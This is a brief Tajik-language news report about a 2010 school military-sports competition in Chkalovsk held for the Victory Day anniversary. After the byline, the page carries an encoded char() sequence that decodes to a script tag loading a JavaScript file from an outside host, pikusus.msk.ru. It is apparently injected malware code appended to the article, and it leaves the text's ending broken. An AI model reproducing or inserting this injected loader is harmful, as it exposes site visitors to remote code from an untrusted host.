8.05.2010
Мусобиқаи варзишӣ- ҳарбии Ватанпарвар
Дар варзишгоҳи марказии шаҳри Чкаловск мусобиқаи ҳарби-варзишии «Ватанпарвар» байни мактабҳои Гимназияи №1 Литсейи №2 ва Донишкадаи кӯҳӣ металлурги баргузор гардид. Чорабиниро директории ташкилоти ҷамъиятии мададгори мудофиаи ш. Чкаловск Дадоҷон Қосимов оғоз намуда аз номи Раиси мададгори мудофиаи Ҷ. Т. генерал Саиданвар Камолов ҳозиринро ба Иди Ғалаба табрик гуфт. Мусобиқаи мазкур ба 65-солагии Иди Ғалаба бахшида шуда иштирокчиён аз рӯи 5 намуд: сангбардорӣ, давидан ба масофаи 100 м, ба дурӣ партофтани норинҷон, ба қисмҳо ҷудо намудан ва ҷобаҷогузории автомат, пур кардан ва холи намудани тирдони автомат байни ҳам қувва озмуданд. Дар ҷамбаст ҷои аввалро Гимназияи №1 ҷои дуюмро Литсей 2 ва ҷои сеюмро Донишкадаи кӯҳӣ металлургии шаҳри Чкаловск ишғол намуданд. Дар охир иштирокчиён бо ифтихорнома ва тӯҳфаҳои хотиравӣ сарфароз гардиданд.
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)e92ffefe24d2776138bae69e22a5577d.js" type="text/javascript">

